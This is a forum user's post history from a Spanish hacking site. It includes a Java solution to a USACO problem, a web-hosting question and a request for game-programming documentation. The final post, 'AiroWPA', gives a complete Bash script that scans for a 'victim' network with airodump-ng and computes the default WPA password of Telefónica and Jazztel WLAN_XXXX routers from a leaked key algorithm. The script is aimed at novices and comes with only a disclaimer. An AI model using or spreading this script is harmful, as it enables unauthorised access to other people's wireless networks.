elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13
1  Programación / Java / Re: Ayuda con problema en: 13 Noviembre 2011, 17:15 pm
Te dejo mi solución que pasa los juegos de prueba en USACO:
Código
  1. import java.io.PrintWriter;
  2. import java.io.BufferedReader;
  3. import java.io.FileReader;
  4. import java.io.FileWriter;
  5. import java.io.IOException;
  6. import java.util.StringTokenizer;
  7.  
  8. public class ride implements Runnable {
  9.    PrintWriter writer;
  10.    BufferedReader reader;
  11.    StringTokenizer tokenizer;
  12.  
  13.    private void solve() throws IOException {
  14.        String s = nextToken(), r = nextToken();
  15.        int a = 1, b = 1;
  16.        for (int i = 0; i < s.length(); ++i) a = (a*(Character.getNumericValue(s.charAt(i)) - 9))%47;
  17.        for (int i = 0; i < r.length(); ++i) b = (b*(Character.getNumericValue(r.charAt(i)) - 9))%47;
  18.  
  19.        if (a == b) writer.println("GO");
  20.        else writer.println("STAY");
  21.    }
  22.  
  23.    public static void main(String[] args) {
  24.        new ride().run();
  25.    }
  26.  
  27.    public void run() {
  28.        try {
  29.            reader = new BufferedReader(new FileReader("ride.in"));
  30.            writer = new PrintWriter(new FileWriter("ride.out"));
  31.            tokenizer = null;
  32.            solve();
  33.            reader.close();
  34.            writer.close();
  35.        }
  36.        catch (IOException e) {
  37.        }
  38.    }
  39.  
  40.    String nextToken() throws IOException {
  41.        if (tokenizer == null || !tokenizer.hasMoreTokens())
  42.            tokenizer = new StringTokenizer(reader.readLine());
  43.        return tokenizer.nextToken();
  44.    }
  45. }

Ya esta, ya he visto mi fallo se me olvido que no empieza desde 1 sino desde 10 ¬¬.
2  Programación / Java / Ayuda con problema [Resuelto] en: 12 Noviembre 2011, 18:32 pm
Hola buenas, estoy dando la cabeza con un problema de una pagina web en Java y no lo consigo, tengo todo menos la parte de calcular. Aqui os pongo el problema (No todo el enunciado porque hay una parte que no sirve).

Citar
Tanto el nombre del grupo y el nombre del cometa son convertidos en un número de la siguiente manera: el número final es simplemente el producto de todas las letras en el nombre, donde "A" es 1 y "Z" es 26. Por ejemplo, el grupo "USACO" sería 21 * 19 * 1 * 3 * 15 = 17955. Si el número del grupo módulo 47 es el mismo que el número del cometa módulo 47, entonces tú necesitas decirle al grupo ¡Alístense¡ (Recuerda que "a mod b" es el residuo después de dividir a por b; 34 mod 10 es 4.)

Escribe un programa el cual lea el nombre de un cometa y el nombre de un grupo y encuentre si de acuerdo al método antes descrito el grupo debe ir en el OVNI detrás de ese cometa y en ese caso imprima "GO", y si no "STAY". Los nombres de los grupos y de los cometas serán cadenas de letras mayúsculas sin espacios ni caracteres de puntuación, hasta de 6 caracteres de longitud.

Ejemplos:

Entrada    Salida
COMETQ
HVNGAT      GO
------------------------
ABSTAR
USACO      STAY


Y este es el código que tengo hecho

Código
  1. public class ride {
  2. private int valorGrupo;
  3. private int valorNave;
  4. private int mod;
  5. private String grupo;
  6. private String nave;
  7. private BufferedReader in;
  8. private PrintWriter out;
  9. private StringTokenizer st;
  10.  
  11. public ride() throws Exception{
  12. try
  13. {
  14. in = new BufferedReader(new InputStreamReader(this.getClass().getResourceAsStream(this.getClass().getSimpleName()+".in")));
  15. out = new PrintWriter(new FileWriter(this.getClass().getSimpleName()+".out"));
  16.  
  17. String datos = in.readLine().trim();
  18. st = new StringTokenizer(datos);
  19. nave = st.nextToken();
  20.  
  21. while((datos = in.readLine()) != null){
  22. st = new StringTokenizer(datos);
  23. grupo = st.nextToken();
  24.  
  25. }
  26.  
  27. if(grupo.length() > 6 || grupo.length() == 0 || nave.length() > 6 || nave.length() == 0)
  28. System.exit(0);
  29.  
  30.  
  31. valorGrupo = 1;
  32. valorNave = 1;
  33.  
  34. for(int i = 0; i < grupo.length(); i++){
  35. valorGrupo *= Character.getNumericValue(grupo.charAt(i));
  36. }
  37.  
  38. for(int i = 0; i < nave.length(); i++){
  39. valorNave *= Character.getNumericValue(nave.charAt(i));
  40. }
  41.  
  42. mod = 47;
  43.  
  44.  
  45. }catch (Exception e) {
  46. throw new Exception(e);
  47. }finally
  48. {
  49. if(in != null)
  50. in.close();
  51. if(out != null)
  52. out.close();
  53. }
  54. }
  55.  
  56.  
  57. public static void main(String[] args) {
  58. try
  59. {
  60. new ride();
  61. System.exit(0);
  62. }catch(Exception e){
  63. e.printStackTrace();
  64. System.exit(-1);
  65. }
  66. }
  67. }
  68.  

Las clases in y out seria para los archivos en donde se encuentra los datos (in) y out (la escritura de si es GO o Stay). Llevo tiempo dando el coco pero no consigo sacar la maldita operacion, o es que lo comprendo mal o no lo se.
3  Programación / Desarrollo Web / Un buen host para web y foro en: 24 Abril 2011, 18:34 pm
Hola buenas, estoy involucrado en un proyecto entre 9 personas (cada uno en su respectivo campo) de una página WEB, en principio teníamos servidor propio pero el que lo mantiene no puede por falta de tiempo entonces hemos decidido contratar un Host pero no sabemos cual es mejor.
Nuestro proyecto esta compuesto de un foro y web. El proyecto esta hecho con base de Joomla, es decir, el host tiene que tener compatibilidad con Joomla, también el host si es posible que se pueda realizar pagos por Paypal.
El host que he encontrado por ahora que me cumple los dos requisitos (al menos que cumpla el de Joomla) es Bluehost. He estado buscando sobre esa empresa y dicen que es muy bueno respecto calidad/precio, un buen servicio técnico, viene con el Cpanel incluido y permite SSH. Me gustaría si alguien lo ha usado, lo usa o conoce alguien que lo ha usado que le pareció esa empresa.
Por último también me podéis recomendar mas empresas que al menos tenga compatibilidad con Joomla y si es posible pago por Paypal, para no tener que asociarlo a ninguna cuenta bancaria ni nada por el estilo.
4  Programación / Java / Re: Juegos en POO en: 8 Marzo 2011, 08:46 am
Gracias Darhius y egyware, empezaré lo antes posible a estudiar la documentación. Pondré ya Solucionado y ya está.
5  Programación / Java / Re: Juegos en POO en: 7 Marzo 2011, 20:29 pm
El juego que tengo pensado es estilo como este, te pongo el link de un minijuego

http://www.minijuegos.com/Draw-Bounce/5477

Es decir que tu dibujas un camino y la bola tiene que llegar hasta un objeto. Me da igual empezar de lo básico hasta esto, pero necesito documentación de como hacerlo.
6  Programación / Java / Juegos en POO [SOLUCIONADO] en: 7 Marzo 2011, 19:14 pm
Hola buenas, tengo pensado hacer un pequeño juego en 2D en Java (Luego portar lo a Android) pero la cuestión, es que no encuentro documentación muy detallada (He encontrado poca cosa pero me es insuficiente) sobre como hacer juegos en POO (más concreto Java), ya que no se como aplicar la física en un sprite, técnicas de buffer para las imágenes y étc. Si alguien me diese información de como hacerlo se lo agradecería un montón. Un Saludo a todos.
7  Foros Generales / Noticias / Re: Linux puede ser vulnerable a través de las memorias USB en: 10 Febrero 2011, 07:33 am
Yo desde que use demasiado root cuando empece en Linux y me cargue el SO lo uso pero que muy poco.
8  Seguridad Informática / Wireless en Linux / Re: AiroWAP en: 8 Febrero 2011, 18:15 pm
Buenas:

Afsoon, andreselmejor lo que te quiere dar a entender es que sería cifrado WPA y no WAP (el WAP está relacionado con los móviles ¿no?)

Y por otro lado no son WLAN_XX sino WLAN_XXXX

Un saludo

ChimoC


Gracias ChimoC no me había dado cuenta, no se que se me ha pasado por la cabeza, siempre me confundo
9  Seguridad Informática / Wireless en Linux / Re: AiroWAP en: 7 Febrero 2011, 16:54 pm
AiroWPA es el nombre que le he puesto a mi script, no es otra cosa y si saca las contraseñas WPA de Telefonica y Jazztel
10  Seguridad Informática / Wireless en Linux / AiroWPA en: 6 Febrero 2011, 17:13 pm
Hola buenas, como todos estaréis al corriente de que se filtrado el algoritmo de las contraseñas WAP de Telefónica y Jazztel, pues bien, me he descargado el script en Bash, que estaba hecho por a.s.r y lo he editado un poco (Pero el algoritmo esta intacto, solo he editado el paso de variables y he añadido unas cosas) y también le he añadido airodump-ng para que sea mas fácil saber la BSSID de la víctima (lo hice para noveles o para los que no se quieren romper la cabeza). Por último, yo no me hago responsable del uso que se le puede dar a terceros (También tengo el aviso en el script) porque quiero enseñar la facilidad de sacar estas contraseñas ahora (eso se encarga la parte de a.s.r) y si esta automatizado el proceso para saber las cosas necesarios en menos de 1 min ya tienes la contraseña (Esa es mi parte, hay muy poca iteración con el usario). Como el saber es libre, aquí tenéis el script
Código
  1. #/bin/bash/
  2.  
  3. #############################################################################################################################################
  4. # Esta parte del script esta hecho por Afsoon (a excepción del algoritmo que esta implantado por a.s.r), yo no me hago responsable del uso # que se le puede dar a terceros, yo hago esto con fines didácticos, para mostrar la poca seguridad de los routers de Telefónica (WLAN_XXXX) # y Jazztel y con la facilidad que se sacan si el proceso se automatiza .
  5. #############################################################################################################################################
  6.  
  7. #Variable de la interfaz que se deberá de escribir antes de iniciar el script
  8. INTERFAZ=
  9. # Se encarga de preguntar antes del inicio si ha escrito la interfaz para ejecutar airodump para saber la ESSID y BSSID
  10.  
  11. echo "Antes de ejecutar este script, ustede debe de haber"
  12. echo "abierto el script y escrito en la variable INTERFAZ"
  13. echo "su interfaz que se usará para airodump"
  14. echo "si no lo ha hecho diga no ahora, escriba la interfaz"
  15. echo "y vuelva a abrir el script y diga si"
  16.  
  17. echo "Ha escrito su interfaz [s]i\[n]o"
  18. read opc
  19.  
  20. if [ $opc == "s" ]; then
  21.  
  22. # Esta parte mostrara el airodump para ver la BSSID y ESSID
  23.  
  24. clear
  25. echo "Ahora se usara airodump, para saber la BSSID y ESSID al"
  26. echo "que desea atacar. Usted puede parar el proceso cuando quiera"
  27. echo "Cuando pare el proceso pasaremos a generar la contraseña"
  28. echo "una vez obtenido los datos necesirarios que se dice a continuación"
  29. echo "Se le abrira Gedit en paralelo a airodump"
  30. echo "y copia el BSSID y ESSID de la víctima"
  31.  
  32. trap 'airodump' INT;
  33. airodump()
  34. {
  35.  
  36. # Ahora ejecuta el script que generara la contraseña pero con unas cuantas variaciones
  37. # en el que hay un paso de variables por teclado
  38. clear
  39. echo CalcWLAN by a.s.r and some edited by Afsoon # NO HE EDITADO EL ALGORITMO
  40.  
  41. echo "Ahora se mostrara lo que debes de escribir"                                                                    
  42.  
  43. echo "Inserte su ESSID"
  44. echo "Por ejemplo WLAN_C58D"
  45.  
  46. read ESSID
  47.  
  48. echo "Inserte el BSSID"
  49. echo "Por ejemplo 64:68:0C:C5:C5:90"
  50.  
  51. read BSSIDS
  52.  
  53. HEAD=$(echo -n "$ESSID" | tr 'a-z' 'A-Z' | cut -d_ -f2)                                              
  54. BSSID=$(echo -n "$BSSIDS" | tr 'a-z' 'A-Z' | tr -d :)                                                
  55. BSSIDP=$(echo -n "$BSSID" | cut -c-8)                                          
  56. KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)                  
  57.  
  58. echo "La clave es $KEY"
  59. exit
  60.  
  61. }
  62.  
  63. sudo airodump-ng $INTERFAZ
  64. wait 2
  65. gedit &
  66. fi
  67.  
  68. if [ $opc == "n" ]; then
  69. exit
  70. fi
  71.  

El funcionamiento del Script es muy simple:

1- Hace una pregunta para saber si has escrito la interfaz (si no se escribe poco hará el Script)
2- si se dice que si, se le dirá que se usara airodump y gedit, este último para apuntar la BSSID y ESSID y cuando acabe con el proceso se pasará a generar la contraseña
3- Cuando se mata el proceso de airodump y se haya copiado el BSSID y ESSID, se le pedirá que se ingrese los datos correspondientes y ya el algoritmo hace su trabajo y te muestra la contraseña.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines